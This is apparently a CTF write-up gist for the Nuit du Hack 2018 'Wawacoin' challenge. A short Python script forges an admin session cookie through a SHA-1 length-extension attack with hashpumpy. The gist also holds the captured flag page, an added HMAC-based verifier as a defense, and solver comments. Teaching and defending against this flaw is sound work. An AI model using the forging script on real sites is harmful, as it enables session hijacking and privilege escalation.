Last active
April 2, 2018 04:21
Nuit du hack CTF quals 2018 - Wawacoin
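```python
# Python 2 script (str.decode('hex') and the print statement)
import requests
from hashpumpy import hashpump

url = 'http://wawacoin.challs.malice.fr/manager'

# Session cookie format: hex(data) + '|' + signature
data = '757365723d64656d6f'.decode('hex')  # 'user=demo'
signature = '9183ff6055a46981f2f71cd36430ed3d9cbf6861'  # 40 hex chars: SHA-1 sized

# Length extension: append '&user=admin', with a key length of 16 bytes
(m2_s, m2) = hashpump(signature, data, "&user=admin", 16)
session = m2.encode('hex') + '|' + m2_s

print requests.get(url, cookies={'session': session}, allow_redirects=False).content
```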
```html
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<title>Wawacoin - THE FLAG IS HERE ! FLAG ON THIS PAGE FLAAAAG</title>
<!-- Bootstrap core CSS -->
<link href="/static/css/bootstrap.min.css" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="/static/css/wawacoin.css" rel="stylesheet">
<link href="/static/css/fontawesome-all.min.css" rel="stylesheet">
</head>
<body>
<div class="container">
<header class="masthead">
<h3 class="text-muted">Wawacoin</h3>
<nav class="navbar navbar-expand-md navbar-light bg-light rounded mb-3">
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarCollapse" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarCollapse">
<ul class="navbar-nav text-md-center nav-justified w-100">
<li class="nav-item active">
<a class="nav-link" href="/">Home</a>
</li>
<li class="nav-item">
<a class="nav-link" href="/register">Registration</a>
</li>
<li class="nav-item">
<a class="nav-link" href="/logout">Logout (admin)</a>
</li>
</ul>
</div>
</nav>
</header>
<main role="main">
<div class="jumbotron">
<h1>Congratz. You stole all my BaitCoins. The flag is <b>NDH{c7774051db4b880da67598770c955ff99363e76d}</b>.</h1>
</div>
</main>
<!-- Site footer -->
<footer class="footer">
<p>© Wawacoin - <b>Kernel Redirection @0x79797979</b></p>
</footer>
</div> <!-- /container -->
<script src="/static/js/jquery-3.2.1.min.js"></script>
<script src="/static/js/bootstrap.min.js"></script>
<script src="/static/js/Chart.bundle.min.js"></script>
<script src="/static/js/wawacoin.js"></script>
<!-- <script src="/js/wawacoin-miner.js">miner_start('CR1n0YrCANNoGM1GNiSS3uGstI');</script> (This is not the flag.) !-->
</body>
</html>
```
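A defender's view of the same cookie format, as an added example that is not part of the gist or the challenge's server code: it assumes the server computed the tag as SHA-1 over a 16-byte secret followed by the data (which the script's key length of 16 and 40-hex-digit signature suggest) and shows an HMAC-based verifier that also rejects padding bytes and repeated keys. `SECRET` and every function name here are hypothetical, and the code is Python 3.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl

SECRET = b"0123456789abcdef"  # constructed 16-byte key, not the challenge's

def sign_weak(data: bytes) -> str:
    # Assumed server scheme: SHA-1 over secret || data, which is length-extendable.
    return hashlib.sha1(SECRET + data).hexdigest()

def sign_hmac(data: bytes) -> str:
    # HMAC re-hashes the inner digest under the key, so a tag for one message
    # does not expose a hash state that can be continued for a longer one.
    return hmac.new(SECRET, data, hashlib.sha256).hexdigest()

def make_cookie(data: bytes, sign=sign_hmac) -> str:
    # Same layout as the page's cookie: hex(data) + "|" + hex tag.
    return data.hex() + "|" + sign(data)

def verify_cookie(cookie: str, sign=sign_hmac) -> dict:
    """Return the session fields, or raise ValueError with the reason."""
    try:
        hex_data, tag = cookie.split("|")
        data = bytes.fromhex(hex_data)
    except ValueError:
        raise ValueError("malformed cookie") from None
    if not hmac.compare_digest(sign(data).encode(), tag.encode()):
        raise ValueError("bad signature")
    # Defense in depth: hash padding appears as 0x80/NUL bytes and the
    # appended parameter as a repeated key, so reject both outright.
    if not data.isascii() or not data.decode("ascii").isprintable():
        raise ValueError("non-printable bytes in session data")
    pairs = parse_qsl(data.decode("ascii"), strict_parsing=True)
    fields = dict(pairs)
    if len(fields) != len(pairs):
        raise ValueError("duplicate session key")
    return fields

def verdict(cookie: str, sign=sign_hmac) -> str:
    try:
        return "ok: " + repr(verify_cookie(cookie, sign))
    except ValueError as exc:
        return "rejected: " + str(exc)

if __name__ == "__main__":
    print(verdict(make_cookie(b"user=demo")))
    print(verdict(make_cookie(b"user=demo&user=admin")))
```

The structural checks run even when the tag verifies, so a payload shaped like an extended message is refused under the weak scheme as well.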
@BookGin If you do it on `/login` it redirects you to `/manager` where the flag is 🤔
@becojo We only check the response status code and content, unfortunately.
Thanks for your writeup!
(BTW, it seems that we both attended DefCamp CTF Finals last year 😄 )
We spent almost 6+ hours hashpumping the session to the wrong url....... (`/login` and `/stealmoney`) 😢

By the way, the HTML comment `CR1n0YrCANNoGM1GNiSS3uGstI` can be reversed, which means `It's guessing 1M gonna cry on IRC`.